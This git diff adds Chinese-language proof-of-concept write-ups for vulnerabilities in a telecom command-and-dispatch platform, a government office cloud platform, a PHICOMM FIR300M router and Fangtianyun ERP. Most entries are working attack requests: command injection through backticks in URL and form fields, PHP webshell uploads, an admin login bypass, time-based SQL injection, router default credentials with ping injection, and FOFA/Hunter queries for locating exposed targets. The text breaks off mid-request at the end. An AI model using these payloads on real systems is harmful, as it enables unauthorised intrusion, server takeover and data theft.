+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/9I-6Dftk3FzJMfK0/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-374335.png)
+
+# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font>
+```plain
+GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1704269810485-436485d3-d594-4d97-a153-bbbe5e015577.png](./img/9I-6Dftk3FzJMfK0/1704269810485-436485d3-d594-4d97-a153-bbbe5e015577-982852.png)
+
+获取命令执行结果
+
+```plain
+GET /api/client/1.txt HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1704269858932-57965ade-866e-41f8-850f-7f9cbbbc6662.png](./img/9I-6Dftk3FzJMfK0/1704269858932-57965ade-866e-41f8-850f-7f9cbbbc6662-188253.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kasf0a92raukvgf5>
\ No newline at end of file
diff --git a/指挥调度平台invite_one_member存在远程命令执行漏洞.md b/指挥调度平台invite_one_member存在远程命令执行漏洞.md
new file mode 100644
index 0000000..4a8f888
--- /dev/null
+++ b/指挥调度平台invite_one_member存在远程命令执行漏洞.md
@@ -0,0 +1,46 @@
+# 指挥调度平台invite_one_member存在远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台invite_one_member存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/HiSRlR6oYxF5SC60/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-490622.png)
+
+# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font>
+```plain
+GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1704269514170-dd697dbd-3d30-4627-b5a8-7c8c9311b12f.png](./img/HiSRlR6oYxF5SC60/1704269514170-dd697dbd-3d30-4627-b5a8-7c8c9311b12f-410619.png)
+
+获取命令执行结果
+
+```plain
+GET /api/client/audiobroadcast/1.txt HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1704269557671-017c3bf2-7d59-4077-9366-383b169516b1.png](./img/HiSRlR6oYxF5SC60/1704269557671-017c3bf2-7d59-4077-9366-383b169516b1-896745.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qrlgzdlrg8kwz94r>
\ No newline at end of file
diff --git a/指挥调度平台invite_one_ptter存在远程命令执行漏洞.md b/指挥调度平台invite_one_ptter存在远程命令执行漏洞.md
new file mode 100644
index 0000000..d2c4b08
--- /dev/null
+++ b/指挥调度平台invite_one_ptter存在远程命令执行漏洞.md
@@ -0,0 +1,46 @@
+# 指挥调度平台invite_one_ptter存在远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台invite_one_ptter存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/FQYE9MXMbjGWC4jB/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-474502.png)
+
+# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font>
+```plain
+GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1704270029047-d62fbfb3-e35a-4ea6-8371-a21c9bd7bb14.png](./img/FQYE9MXMbjGWC4jB/1704270029047-d62fbfb3-e35a-4ea6-8371-a21c9bd7bb14-708883.png)
+
+获取命令执行结果
+
+```plain
+GET /api/client/ptt/1.txt HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1704270043886-4f20f40a-90f9-4e95-9d1f-7ae37ddc22b0.png](./img/FQYE9MXMbjGWC4jB/1704270043886-4f20f40a-90f9-4e95-9d1f-7ae37ddc22b0-502208.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/letplgg87ootvc4x>
\ No newline at end of file
diff --git a/指挥调度平台send_fax存在远程命令执行漏洞.md b/指挥调度平台send_fax存在远程命令执行漏洞.md
new file mode 100644
index 0000000..24f9115
--- /dev/null
+++ b/指挥调度平台send_fax存在远程命令执行漏洞.md
@@ -0,0 +1,51 @@
+# 指挥调度平台send_fax存在远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台send_fax存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/ObPXNwJRo2S4XdO_/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-954994.png)
+
+# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font>
+```plain
+POST /api/client/fax/send_fax.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Content-Length: 29
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+
+fax_name=`whoami > 1.txt`.pdf
+```
+
+![1706073841954-f6338ebb-177f-401c-b470-20545bad6ec1.png](./img/ObPXNwJRo2S4XdO_/1706073841954-f6338ebb-177f-401c-b470-20545bad6ec1-509394.png)
+
+获取命令执行结果
+
+```plain
+GET /api/client/fax/1.txt HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
+Upgrade-Insecure-Requests: 1
+```
+
+![1706073883647-6d19d499-6d63-4239-b337-f757006f5d16.png](./img/ObPXNwJRo2S4XdO_/1706073883647-6d19d499-6d63-4239-b337-f757006f5d16-090767.png)
+
+[福建科立讯通信-指挥调度平台-send-fax-远程命令执行.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222143771-9a0b3a4a-d028-4593-a184-ee7c7d7dad61.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ficwasc2nrssf2yb>
\ No newline at end of file
diff --git a/指挥调度平台task_uploadfile存在任意文件上传漏洞.md b/指挥调度平台task_uploadfile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..7024eb0
--- /dev/null
+++ b/指挥调度平台task_uploadfile存在任意文件上传漏洞.md
@@ -0,0 +1,54 @@
+# 指挥调度平台task_uploadfile存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台task_uploadfile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/ZLm82UHYMYXi_L_H/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-336348.png)
+
+# 四、漏洞复现
+```plain
+POST /api/client/task/uploadfile.php HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
+Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
+Content-Length: 374
+
+------WebKitFormBoundary25qW4eG1Jt50iyf7
+Content-Disposition: form-data; name="uuid"
+
+1
+------WebKitFormBoundary25qW4eG1Jt50iyf7
+Content-Disposition: form-data; name="number"
+
+122
+------WebKitFormBoundary25qW4eG1Jt50iyf7
+Content-Disposition: form-data; name="uploadfile";filename="1.php"
+Content-Type: image/jpg
+
+111
+------WebKitFormBoundary25qW4eG1Jt50iyf7--
+```
+
+![1704270749752-fadb9dfe-fbd1-4e6d-b77a-4ab2dd541922.png](./img/ZLm82UHYMYXi_L_H/1704270749752-fadb9dfe-fbd1-4e6d-b77a-4ab2dd541922-339121.png)
+
+上传文件位置
+
+```plain
+/upload/task/9cba3789-1c28-4aea-a205-1eb5faa3f477.php
+```
+
+![1704270802457-10dfe6ec-c7d9-4a36-9180-3cb6475dbf93.png](./img/ZLm82UHYMYXi_L_H/1704270802457-10dfe6ec-c7d9-4a36-9180-3cb6475dbf93-507189.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hfduq1o9a7uh3hh3>
\ No newline at end of file
diff --git a/指挥调度平台usernumber存在SQL注入漏洞.md b/指挥调度平台usernumber存在SQL注入漏洞.md
new file mode 100644
index 0000000..90689bf
--- /dev/null
+++ b/指挥调度平台usernumber存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 指挥调度平台usernumber存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台usernumber存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/xEaSzFspIi7a8WRB/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-654779.png)
+
+# 四、漏洞复现
+```plain
+POST /api/get_sos/items.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=4c1e6025b94bac25c4ec63e4affec7cd; authcode=3hqs
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+
+sign=7a6f931dde8e8aafbbfa4d2bcab475e6&timestamp=1686020152221&usernumber=1' AND (SELECT 5464 FROM (SELECT(SLEEP(5)))FZxX) AND 'khLM'='khLM
+```
+
+![1701143980161-27f11348-a6a0-42f5-9252-b3d4379e63a7.png](./img/xEaSzFspIi7a8WRB/1701143980161-27f11348-a6a0-42f5-9252-b3d4379e63a7-804570.png)
+
+sqlmap
+
+```plain
+sqlmap -r 2.txt --batch -p usernumber
+```
+
+![1701143998178-09bee0f6-0d3e-4ee7-a4dd-320c79bc10b4.png](./img/xEaSzFspIi7a8WRB/1701143998178-09bee0f6-0d3e-4ee7-a4dd-320c79bc10b4-121402.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rnocaiwi1rqd0dx5>
\ No newline at end of file
diff --git a/指挥调度平台zx_upload存在任意文件上传漏洞.md b/指挥调度平台zx_upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..cde6bec
--- /dev/null
+++ b/指挥调度平台zx_upload存在任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 指挥调度平台zx_upload存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台zx_upload存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/dtrlvvnt9GTXfWHv/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-007881.png)
+
+# 四、漏洞复现
+```plain
+POST /custom/zx/upload.php HTTP/1.1
+Host: {hostname}
+Content-Length: 180
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundarySwvD8hSn3Z0sHfMu
+Content-Disposition: form-data; name="ulfile";filename="1.php"
+Content-Type: image/png
+
+<?php echo 222*111;?>
+------WebKitFormBoundarySwvD8hSn3Z0sHfMu--
+```
+
+![1704271134372-bb98e096-7cfc-456f-b840-bd1829f83a8d.png](./img/dtrlvvnt9GTXfWHv/1704271134372-bb98e096-7cfc-456f-b840-bd1829f83a8d-238637.png)
+
+上传文件位置
+
+```plain
+/upload/1.php
+```
+
+![1704271164814-a0e390ba-a95a-471a-b3a3-79e8a379df27.png](./img/dtrlvvnt9GTXfWHv/1704271164814-a0e390ba-a95a-471a-b3a3-79e8a379df27-548553.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gpc8sz8begguncm0>
\ No newline at end of file
diff --git a/数字通云平台智慧政务setting存在文件上传漏洞.md b/数字通云平台智慧政务setting存在文件上传漏洞.md
new file mode 100644
index 0000000..aa15d2f
--- /dev/null
+++ b/数字通云平台智慧政务setting存在文件上传漏洞.md
@@ -0,0 +1,52 @@
+# 数字通云平台智慧政务setting存在文件上传漏洞
+
+数字通云平台智慧政务setting存在文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```java
+body="assets/8cca19ff/css/bootstrap-yii.css"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /portal/default/login HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+
+userID=admin&flag=rone
+```
+
+携带cookie
+
+```javascript
+POST /sys/mobile/setting HTTP/1.1
+Host: 
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: your-cookie
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------318638034016337576332132513456
+
+-----------------------------318638034016337576332132513456
+Content-Disposition: form-data; name="MobileApplication[cert]"; filename="1.php"
+Content-Type: application/octet-stream
+
+<?php system("whoami");unlink(__FILE__);?>
+-----------------------------318638034016337576332132513456--
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409201619573.png)
+
+文件路径：`/static/seal/1.php`
\ No newline at end of file
diff --git a/数字通云平台智慧政务workflow存在SQL注入漏洞.md b/数字通云平台智慧政务workflow存在SQL注入漏洞.md
new file mode 100644
index 0000000..855d104
--- /dev/null
+++ b/数字通云平台智慧政务workflow存在SQL注入漏洞.md
@@ -0,0 +1,43 @@
+# 数字通云平台智慧政务workflow存在SQL注入漏洞
+
+数字通云平台 智慧政务 /workflow/query/index 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```java
+body="assets/8cca19ff/css/bootstrap-yii.css"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /portal/default/login HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+
+userID=admin&flag=rone
+```
+
+携带cookie进行注入
+
+```javascript
+GET /workflow/query/index?WfRtApplication%5Bselect_user%5D=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71786b7a71%2C%28SELECT%20%28ELT%285761=5761%2C1%29%29%29%2C0x7162717871%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29 HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Cookie: your-cookie
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: */*
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181346234.png)
\ No newline at end of file
diff --git a/数字通云平台的智慧政务系统存在登录绕过漏洞.md b/数字通云平台的智慧政务系统存在登录绕过漏洞.md
new file mode 100644
index 0000000..44eec0e
--- /dev/null
+++ b/数字通云平台的智慧政务系统存在登录绕过漏洞.md
@@ -0,0 +1,26 @@
+# 数字通云平台的智慧政务系统存在登录绕过漏洞
+
+数字通云平台的智慧政务系统存在登录绕过漏洞，login接口中存在未授权访问默认cookie的风险，未经身份验证的远程攻击者可利用此漏洞伪造Cookie登录 
+
+## fofa
+
+```java
+body="assets/8cca19ff/css/bootstrap-yii.css"
+```
+
+## poc
+
+```javascript
+POST /portal/default/login HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+
+userID=admin&flag=rone
+```
+
diff --git a/斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md b/斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md
new file mode 100644
index 0000000..a5eca5e
--- /dev/null
+++ b/斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md
@@ -0,0 +1,33 @@
+# 斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞
+
+# 一、漏洞简介
+斐讯路由器PHICOMM-FIR300M使用默认密码admin/admin登录后台后，系统管理的控制台功能虽然在前端过滤了敏感字符，但是在后端未对输入内容做校验，导致可抓包修改参数造成任意命令执行。
+
+# 二、影响版本
++ 斐讯路由器PHICOMM-FIR300M
+
+# 三、资产测绘
++ hunter`web.title=="FIR300M"`
++ 特征
+
+![1699457151559-09e05449-f72f-444e-ab18-1178bd684415.png](./img/MQdwvYp3bC36b_KW/1699457151559-09e05449-f72f-444e-ab18-1178bd684415-100943.png)
+
+# 四、漏洞复现
+1.使用默认密码`admin/admin`登录路由器
+
+![1699457195498-1b5878db-d293-4f80-a29c-99b09d3f2026.png](./img/MQdwvYp3bC36b_KW/1699457195498-1b5878db-d293-4f80-a29c-99b09d3f2026-944268.png)
+
+2. `系统工具`->`系统诊断`
+
+![1699457245475-e8944ca0-334f-4962-8ba4-091d17e18af1.png](./img/MQdwvYp3bC36b_KW/1699457245475-e8944ca0-334f-4962-8ba4-091d17e18af1-928663.png)
+
+3. 修改ip地址为`8.8.8.8`，使用burp抓包,修改`pingAddr`参数为`ip|ls`后放行
+
+![1699457354699-61ddc345-a148-4ab5-ab04-3677a181f8a9.png](./img/MQdwvYp3bC36b_KW/1699457354699-61ddc345-a148-4ab5-ab04-3677a181f8a9-455575.png)
+
+![1699457718292-c9b1e951-6beb-42e1-b9bc-b5f630631da3.png](./img/MQdwvYp3bC36b_KW/1699457718292-c9b1e951-6beb-42e1-b9bc-b5f630631da3-598437.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgwam74g3eagpt5z>
\ No newline at end of file
diff --git a/方天云ERP系统GetCompanyItem存在SQL注入漏洞.md b/方天云ERP系统GetCompanyItem存在SQL注入漏洞.md
new file mode 100644
index 0000000..f66b388
--- /dev/null
+++ b/方天云ERP系统GetCompanyItem存在SQL注入漏洞.md
@@ -0,0 +1,37 @@
+# 方天云ERP系统GetCompanyItem存在SQL注入漏洞
+
+# 一、漏洞简介
+方天软件以云ERP+MES产品为核心，整合设备层的工业数据，提供软硬件智能+整合方案服务，赋能数字工厂新智造。在模具制造、五金机械、塑胶成型、电子组装等行业成效显著，包括财富500强的企业也正在通过方天软件的综合管理方案而持续获益。方天云ERP系统GetCompanyItem存在SQL注入漏洞
+
+# 二、影响版本
++ 方天云ERP
+
+# 三、资产测绘
++ fofa`body="AjaxMethods.asmx/GetCompanyItem"`
++ 特征
+
+![1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c.png](./img/YeZr3L9ppZ9Vc3mW/1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c-141307.png)
+
+# 四、漏洞复现
+```plain
+POST /AjaxMethods.asmx/GetCompanyItem HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Cookie: ASP.NET_SessionId=scc55sifm4qstcyuiswqqeqi
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
+X-Requested-With: XMLHttpRequest
+Content-Type: application/json
+
